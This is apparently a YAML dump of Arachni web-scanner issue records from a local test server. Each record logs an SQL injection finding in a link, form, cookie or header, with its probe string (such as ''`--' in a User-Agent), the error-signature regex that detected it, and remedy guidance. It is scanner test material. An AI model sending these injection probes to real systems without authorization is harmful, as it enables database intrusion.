severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/emc/link/flip?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) :match: ! '[DM_QUERY_E_SYNTAX]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: Parameter flip :element: link :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/emc/link/flip?input=default :verification: :id: ! '[DM_QUERY_E_SYNTAX]' var: Parameter flip url: http://localhost:7362/emc/link/flip?input=default injected: '' id: ! '[DM_QUERY_E_SYNTAX]' regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) regexp_match: ! '[DM_QUERY_E_SYNTAX]' elem: link remarks: {} method: GET response: ! 
'["[DM_QUERY_E_SYNTAX]\nhas occurred in the vicinity of:\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NjQ= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDoyOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/emc/cookie/flip elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) :match: ! '[DM_QUERY_E_SYNTAX]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: Parameter flip :element: cookie :params: {} :follow_location: true :cookies: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/emc/cookie/flip :verification: :id: ! '[DM_QUERY_E_SYNTAX]' var: Parameter flip url: http://localhost:7362/emc/cookie/flip injected: '' id: ! '[DM_QUERY_E_SYNTAX]' regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) regexp_match: ! '[DM_QUERY_E_SYNTAX]' elem: cookie remarks: {} method: GET response: ! 
'[nil, "[DM_QUERY_E_SYNTAX]\nhas occurred in the vicinity of:\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NjQ= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDozMSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: cookie2 url: http://localhost:7362/emc/cookie/append elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) :match: ! '[DM_QUERY_E_SYNTAX]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value) :injected: cookie value) :combo: !binary "Y29va2llMg==": cookie value) :action: http://localhost:7362/emc/cookie/append :verification: :id: ! '[DM_QUERY_E_SYNTAX]' var: cookie2 url: http://localhost:7362/emc/cookie/append injected: cookie value) id: ! '[DM_QUERY_E_SYNTAX]' regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) regexp_match: ! '[DM_QUERY_E_SYNTAX]' elem: cookie remarks: {} method: GET response: ! 
'[DM_QUERY_E_SYNTAX] has occurred in the vicinity of: ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value) response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NTM= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDozMSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/emc/header/flip elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) :match: ! '[DM_QUERY_E_SYNTAX]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: Parameter flip :element: header :params: :follow_location: true :headers: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/emc/header/flip :verification: :id: ! '[DM_QUERY_E_SYNTAX]' var: Parameter flip url: http://localhost:7362/emc/header/flip injected: '' id: ! '[DM_QUERY_E_SYNTAX]' regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) regexp_match: ! '[DM_QUERY_E_SYNTAX]' elem: header remarks: {} method: GET response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, "[DM_QUERY_E_SYNTAX]\nhas occurred in the vicinity of:\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev ! 
'''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjA5 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDo0OCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: true references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: User-Agent url: http://localhost:7362/emc/header/append elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: true references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) :match: ! '[DM_QUERY_E_SYNTAX]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user'`-- :injected: arachni_user'`-- :combo: User-Agent: arachni_user'`-- :action: http://localhost:7362/emc/header/append :verification: :id: ! '[DM_QUERY_E_SYNTAX]' var: User-Agent url: http://localhost:7362/emc/header/append injected: arachni_user'`-- id: ! '[DM_QUERY_E_SYNTAX]' regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\]) regexp_match: ! '[DM_QUERY_E_SYNTAX]' elem: header remarks: {} method: GET response: ! 
'[DM_QUERY_E_SYNTAX] has occurred in the vicinity of: ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user'`-- Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NTM= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDo1NCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: true references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/sqlite/form/flip elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: true references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Warning.*sqlite_.*) :match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil] :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: Parameter flip :element: form :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/sqlite/form/flip :verification: :id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil] var: Parameter flip url: http://localhost:7362/sqlite/form/flip injected: '' id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil] regexp: (?i-mx:Warning.*sqlite_.*) regexp_match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil] elem: form remarks: {} method: GET response: ! 
'["Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTA1 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDo1NyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/sqlite/form/append elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Warning.*sqlite_.*) :match: Warning stuff sqlite_ :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default'`-- :follow_location: true :injected: default'`-- :combo: !binary "aW5wdXQ=": default'`-- :action: http://localhost:7362/sqlite/form/append :verification: :id: Warning stuff sqlite_ var: input url: http://localhost:7362/sqlite/form/append injected: default'`-- id: Warning stuff sqlite_ regexp: (?i-mx:Warning.*sqlite_.*) regexp_match: Warning stuff sqlite_ elem: form remarks: {} method: GET response: ! 
'Warning stuff sqlite_ SQLite/JDBCDriver SQLite.Exception System.Data.SQLite.SQLiteException ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OTI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDo1NyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/sqlite/link/flip?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Warning.*sqlite_.*) :match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil] :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: Parameter flip :element: link :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/sqlite/link/flip?input=default :verification: :id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil] var: Parameter flip url: http://localhost:7362/sqlite/link/flip?input=default injected: '' id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil] regexp: (?i-mx:Warning.*sqlite_.*) regexp_match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil] elem: link remarks: {} method: GET response: ! 
'["Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTA1 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDo1OSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 